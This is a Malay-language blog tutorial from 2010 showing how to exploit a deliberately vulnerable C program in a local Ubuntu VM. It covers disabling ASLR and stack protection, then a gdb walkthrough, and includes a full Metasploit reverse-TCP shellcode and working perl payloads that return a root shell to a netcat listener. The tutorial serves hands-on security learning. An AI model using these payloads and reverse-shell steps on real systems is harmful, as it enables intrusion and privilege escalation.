Custom Search

Ahad, 27 Jun 2010

Tutorial Eksploitasi Buffer Overflow Termudah untuk Difahami

(English version of this tutorial will be available soon on kaibathelegacy.blogspot.com)

Penyediaan Box yang Bocor

Bahan-bahannya:

• Ubuntu Lucid Lynx (atau yg lebih lama lagi baik) di dalam VirtualBox atau VMWare. Tak perlu update. Buang perisian yg tak berkenaan jika suka untuk mengurangkan saiz Virtual Machine.

• Install Metasploit pada PC anda (bukan VM, diperlukan untuk generate reverse shell). Muat Turun dari http://www.metasploit.com bersesuaian dengan OS yang menjadi host untuk VM Ubuntu/ Box yang Bocor ini.

• Sekiranya anda Pengguna Windows, pastikan anda sudah ada netcat.exe untuk terima shell dari mangsa (Box yang Bocor). Pengguna distro linux, netcat sudah sedia ada.

Kafiat untuk bermula:


Buka Terminal di Box yang bocor,

anda taip

cat /proc/sys/kernel/randomize_va_space

Pastikan nilainya 0. Sekiranya bukan. Taip

sudo /sbin/sysctl -w kernel.randomize_va_space=0

Periksa nilai randomize_va_space semula.

cat /proc/sys/kernel/randomize_va_space


Contoh Kod yang ada Buffer Overflow
/* Save Kod sebagai mangkuk.c * Nak mudah save di Desktop*Copy kod dari sini*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *string) {

  char buffer[1024];

  strcpy(buffer, string);

  return 1;
}

int main(int argc, char *argv[]) {

  bof(argv[1]);
  printf("Done..\n");

  return 1;
}
/*Sampai la sini*/




Di terminal anda tadi, ikuti langkah berikut.


cd ~/

cd Desktop/

ls -al


Contoh:


[email protected]:~/Desktop$ cd ~/
[email protected]:~$ cd Desktop/
[email protected]:~/Desktop$ ls -al
total 104
drwxr-xr-x 2 saifool saifool 4096 2010-06-25 23:28 .
drwxr-xr-x 25 saifool saifool 4096 2010-06-25 23:23 ..
-rwxr-xr-x 1 saifool saifool 8484 2010-06-24 23:31 bufvulcode
-rw-r--r-- 1 saifool saifool 478 2010-06-24 23:30 bufvulcode.c
-rwxr-xr-x 1 saifool saifool 8811 2010-06-24 23:36 eggcode
-rw-r--r-- 1 saifool saifool 922 2010-06-24 23:35 eggcode.c
-rwxr-xr-x 1 saifool saifool 8297 2010-06-24 23:38 findeggaddr
-rw-r--r-- 1 saifool saifool 129 2010-06-24 23:36 findeggaddr.c
-rwxr-xr-x 1 saifool saifool 550 2010-06-24 21:06 gedit.desktop
-rwxr-xr-x 1 saifool saifool 476 2010-06-24 21:04 gnome-terminal.desktop
-rwxr-xr-x 1 saifool saifool 8611 2010-06-25 21:36 mangkuk
-rw-r--r-- 1 saifool saifool 245 2010-06-24 21:07 mangkuk.c
-rw-r--r-- 1 saifool saifool 3886 2010-06-25 21:56 shellz
-rw-r--r-- 1 saifool saifool 2149 2010-06-25 23:23 shellz2
-rwxr-xr-x 1 root root 9898 2010-06-25 22:55 smashme2
-rw-r--r-- 1 saifool saifool 301 2010-06-25 22:54 smashme2.c
[email protected]:~/Desktop$


Sekarang masa untuk compile code C, mangkuk,c tadi. Kita tak boleh compile kod tersebut cara biasa. Kita kena matikan fungsi StackGuard dlm gcc dan membenarkan execstack.

Contoh:

[email protected]:~/Desktop$ gcc -ggdb -fno-stack-protector -z execstack mangkuk.c -o mangkuk


[email protected]:~/Desktop$ ./mangkuk
Segmentation fault

[email protected]:~/Desktop$ ./mangkuk `perl -e 'print "A"x1000'`
Done..
[email protected]:~/Desktop$ ./mangkuk `perl -e 'print "A"x1024'`
Done..
[email protected]:~/Desktop$ ./mangkuk `perl -e 'print "A"x1200'`
Segmentation fault
[email protected]:~/Desktop$

Apa yang dimaksudkan dengan perintah ./mangkuk `perl -e 'print "A"x1000'` tu? Perintah ini sama dengan A sebanyak 1000 kali sebagai input untuk program mangkuk ini. Untuk mengenal konsep buffer overflow ni dengan lebih mendalam, sila baca rujukan tambahan di bawah artikel ini. Sebab saya lebih fokus untuk mereka yang ingin hands-on dalam memahami buffer overflow ini. Saya cuma akan terangkan secara ringkas sahaja.

Kita lihat kod mangkuk.c tadi.

char buffer[1024];

Saiz buffer yang diperuntukkan ialah 1024 bytes. Tapi tak semestinya bila kita input 1025 bytes, terus ada segmentation fault; salah satu dari tanda-tanda buffer overflow. Kita akan gunakan teknik 'direct jump'. Macam mana nak cari segmentation fault yang benar2 berguna?

Terlebih dahulu, kita akan berkenalan dengan GDB. Di Terminal, taip
gdb mangkuk

Out put seperti di bawah

[email protected]:~/Desktop$ gdb mangkuk
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /home/saifool/Desktop/mangkuk...done.
(gdb)


Di GDB ni, kita boleh lihat struktur dalaman mana2 program yg telah dikompil.

Sila tulis arahan berikut di gdb.


set disassembly-flavor intel

disass main


Contoh output

(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x08048439 <+0>: push ebp
0x0804843a <+1>: mov ebp,esp
0x0804843c <+3>: and esp,0xfffffff0
0x0804843f <+6>: sub esp,0x10
0x08048442 <+9>: mov eax,DWORD PTR [ebp+0xc]
0x08048445 <+12>: add eax,0x4
0x08048448 <+15>: mov eax,DWORD PTR [eax]
0x0804844a <+17>: mov DWORD PTR [esp],eax
0x0804844d <+20>: call 0x8048414
0x08048452 <+25>: mov DWORD PTR [esp],0x8048530
0x08048459 <+32>: call 0x8048350
0x0804845e <+37>: mov eax,0x1
0x08048463 <+42>: leave
0x08048464 <+43>: ret
End of assembler dump.

Anda nampak 0x0804843f <+6>: sub esp,0x10 . 10 dalam asas nombor 16 (HEX) ialah 16 dalam asas nombor 10 (DEC). Maknanya, memori memperuntukkan 1024 (dah declare pada buffer) dan ditambah dengan 16 menjadikan saiz buffer 1040. Walaupun segmentation fault mungkin berlaku, kita tidak dapat mengeksploitasi bug ini dengan baik.


Untuk lebih memudahkan anda semua memahami konsep eksploitasi buffer overflow ini, Sekarang di gdb taip arahan berikut


run `perl -e 'print "A"x1025'`
run `perl -e 'print "A"x1029'`
run `perl -e 'print "A"x1038'`
run `perl -e 'print "A"x1040'`

Contoh Output:

(gdb) run `perl -e 'print "A"x1025'`
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1025'`
Done..

Program exited with code 01.
(gdb) run `perl -e 'print "A"x1029'`
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1029'`
Done..

Program exited with code 01.
(gdb) run `perl -e 'print "A"x1038'`
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1038'`

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb) run `perl -e 'print "A"x1040'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x1040'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

" Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? "

ini bermaksud EIP (Extended Instruction Pointer) adalah pada 0x41414141 yang tidak wujud. Sebab itu ada ralat. Kita perlu gantikan dengan alamat yg wujud di mana pada alamat itu kita akan letak shellcode iaitu sebuah reverse shell yg membolehkan kita mengakses terminal Box yang Bocor dari host kita.

Persediaan Shellcode

Anda sudah memasang Metasploit pada host anda? Jika sudah. Sila Buka Terminal dan taip

msfweb
Tunggu seketika sehingga output seperti ini keluar

[email protected]:~/Desktop$ msfweb
[*] Warning: As of Metasploit 3.3 this interface is no longer supported:
Please see https://metasploit.com/redmine/issues/502


[*] Starting msfweb v3.4.1-dev on http://127.0.0.1:55555/

config.gem: Unpacked gem rack-1.0.1 in vendor/gems has no specification file. Run 'rake gems:refresh_specs' to fix this.
=> Booting WEBrick
=> Rails 2.3.5 application starting on http://127.0.0.1:55555
[*] Initializing the Metasploit Framework...
[*] Initialized the Metasploit Framework
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2010-06-27 20:18:55] INFO WEBrick 1.3.1
[2010-06-27 20:18:55] INFO ruby 1.9.1 (2009-07-16) [x86_64-linux]
[2010-06-27 20:18:55] INFO WEBrick::HTTPServer#start: pid=23567 port=55555

Sekarang buka firefox,chrome atau mana2 browser pilihan anda. Lawati http://localhost:55555

Pilih Payloads.

Cari "x86" pada textbox. Pilih Linux Command Shell, Reverse TCP Inline.

Ada input yang perlu anda masukkan.

LHOST (ip local host anda, sebagai contoh local ip saya): 192.168.1.2

LPORT (port listening netcat anda, ikut je contoh saya): 12345

Max size: 96

Kemudian , klik Generate.

Anda akan nampak output seperti ini

/*
* linux/x86/shell_reverse_tcp - 96 bytes
* http://www.metasploit.com
* Encoder: generic/none
* NOP gen: x86/single_byte
* LHOST=192.168.1.2, LPORT=12345, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false, InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52"
"\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53"
"\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8"
"\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43"
"\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
"\x89\xe1\xb0\x0b\xcd\x80";


shellcode anda mungkin berbeza disebabkan perbezaan local ip atau yg lain. Sekarang kita perlu ubah ini

"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52"
"\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53"
"\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8"
"\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43"
"\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

menjadi seperti ini

\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


Sekarang untuk percubaan mengeksploitasi bug ini, kita akan gunakan konsep berikut.

[ A x 600] [NOP x340] [Shellcode 96] [BBBB] = 1040

Ok di dalam gdb, taip arahan berikut:

run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Contoh Output:

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)


Cantekkk. 0x42424242 yg bersamaan dengan "BBBB" betul2 berada di EIP yang kita boleh letak address yang menghala ke shellcode kita.

Sebelum itu di host anda (bukan Box yang Bocor), taip
nc -l 12345 -vv

Sekiranya tidak berjaya/error netcat


nc -l -p 12345 -vv

Command netcat ini digunakan untuk menerima shell dari Box yang bocor.


Kembali semula ke Box yang bocor, di gdb, taip
(gdb) x/2000xb $esp

Tekan Enter sampai selesai.

Contoh Output:
..dipotong....
0xbffff468: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff470: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff478: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff480: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff488: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff490: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff498: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4b8: 0x41 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4c0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
---Type to continue, or q to quit---
...dipotong....

Skroll sehingga anda nampak deretan 0x41 yang bermaksud "A" dan deretan "0x90" ataupun NOP. Sila pilih address pada NOP sebagai return address untuk shell anda. Sebagai contoh saya pilih 0xbffff4d8. Address anda kebarangkalian besar berbeza dengan address saya. Pilih mana2 address 0x90 selepas deretan 0x41. elakkan memilih address yg hujungnya 00. Yang tiada angka sifar lebih baik.

Kita perlu tukar kepada format little endian utk membolehkan alamat ini diexecute oleh program.

Contoh:

0xbffff4d8

tukar jadi

bf ff f4 d8

tukar jadi

d8 f4 ff bf

\xd8\xf4\xff\xbf


Sekarang kita gantikan "BBBB" dengan "\xd8\xf4\xff\xbf" atau address anda.

Di gdb, masa untuk mengeksploitasi

arahan ini

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Kita tukar jadi

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`


Sekiranya tiada masalah

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/saifool/Desktop/mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`
process 3371 is executing new program: /bin/dash

Sila lihat netcat anda, contoh output

[email protected]:~/Desktop$ nc -l 12345 -vv
Connection from 192.168.1.5 port 12345 [tcp/*] accepted

Voila! anda sudah dapat shell. Sekarang mari kita cuba guna arahan linux ini


echo "ID mangsa:";whoami;echo "ID penuh:";id;echo "Folder sekarang:"; pwd;echo "Kernel Linux:"; uname -a;echo "Maklumat Distro:"; lsb_release -a;exit

Contoh output:

ID mangsa:
saifool
ID penuh:
uid=1000(saifool) gid=1000(saifool) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(saifool)
Folder sekarang:
/home/saifool/Desktop
Kernel Linux:
Linux saifool-laptop 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
Maklumat Distro:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04 LTS
Release: 10.04
Codename: lucid

Sekarang kita cuba eksploitasi tanpa gdb dengan melaksanakan program mangkuk dengan akses root :D


(gdb) q

[email protected]:~/Desktop$ sudo su
[email protected]:/home/saifool/Desktop# ./mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\xd8\xf4\xff\xbf"'`
Segmentation fault
[email protected]:/home/saifool/Desktop#


Oppps, error. Kenapa ye? Sebab return address bertukar. Sekarang kita ulangkaji balik untuk mencari return address untuk root

sebagai root, di terminal taip


gdb mangkuk

(gdb) run `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

(gdb) x/2000xb $esp

...dipotong....

---Type to continue, or q to quit---
0xbffff6c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff700: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff708: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff710: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff718: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff720: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff728: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff730: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff738: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff740: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff748: 0x41 0x41 0x41 0x41 0x90 0x90 0x90 0x90
0xbffff750: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff758: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff760: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff768: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff770: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff778: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff780: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
... dipotong ....

Anda perasan kan address berbeza dari user biasa. Sekarang saya pilih 0xbffff768. Dalam little endian menjadi \x68\xf7\xff\xbf.

Sekarang kita dah jumpa address untuk root.

(gdb) q

untuk keluar dari gdb

Oh ya, Jangan lupa untuk listen netcat di host anda dengan arahan "nc -l 12345 -vv" terlebih dahulu.

di terminal taip

./mangkuk `perl -e 'print "A"x600,"\x90"x340,"\x1e\x57\x5a\x56\x46\x5a\x4c\x4d\x37\x37\x5b\x51\x4a\x44\x52\x1e\xfc\x58\x51\x3f\xf5\x53\xf5\xf5\xf9\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x02\x66\x68\x30\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x68\xf7\xff\xbf"'`

Sekarang lihat di netcat anda di host, cuba laksanakan arahan untuk user biasa tadi :)

[email protected]:~/Desktop$ nc -l 12345 -vv
Connection from 192.168.1.5 port 12345 [tcp/*] accepted
echo "ID mangsa:";whoami;echo "ID penuh:";id;echo "Folder sekarang:"; pwd;echo "Kernel Linux:"; uname -a;echo "Maklumat Distro:"; lsb_release -a
ID mangsa:
root
ID penuh:
uid=0(root) gid=0(root) groups=0(root)
Folder sekarang:
/home/saifool/Desktop
Kernel Linux:
Linux saifool-laptop 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
Maklumat Distro:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04 LTS
Release: 10.04
Codename: lucid


Sekian, Terima Kasih. Sekiranya anda ada kemusykilan, silakan bertanya dengan memberikan komentar. Elakkan bahasa singkatan yang keterlaluan untuk memudahkan kefahaman saya. Terima kasih. Jangan lupa untuk membaca rujukan yang disertakan sekali di bawah.

Rujukan dan Bacaan Tambahan



http://www.packetstormsecurity.org/papers/attack/Preddy-tutorial.txt [Accessed June 26,2010]

Foster, J.C., 2005. Buffer overflow attacks: detect, exploit, prevent, Syngress Media Inc.

https://secure.wikimedia.org/wikipedia/en/wiki/Buffer_overflow [Accessed June 26,2010]

OWASP_Top_10_2007.pdf. Available at: http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf [Accessed April 16, 2010].

Balaban, &., Buffer Overflows Demystified, Enderunix.org. Available at: http://www.securityforest.com/downloads/educationtree/bof-eng.txt [Accessed June 26, 2010].

Klein, &., 2004. Buffer Overflow, Available at: http://c0re.23.nu/~chris/presentations/overflow2005.pdf [Accessed June 26, 2010].

3 ulasan:

Agent Sil berkata...

nice tut..cuam perlu detailkan ckit lagi..baru aku leh faham..:P

tahniah dgn tut yg panjang lebar ni..err..bro..mohon copypaste to my blog?

of course credit to u..:)

ak47suk1 berkata...

part mana yg tak faham tu bro? Kalau aku free nanti aku cuba semak balik. Sekarang dalam mood bz.

Nak copy, copy je. Lagipun semua artikel yg aku tulis sendiri dalam blog ni di lesenkan bawah GPL a.k.a sumber terbuka.

deensokmo berkata...

hee.hee langsung tak faham apa tujuannya ni..

carian google

Custom Search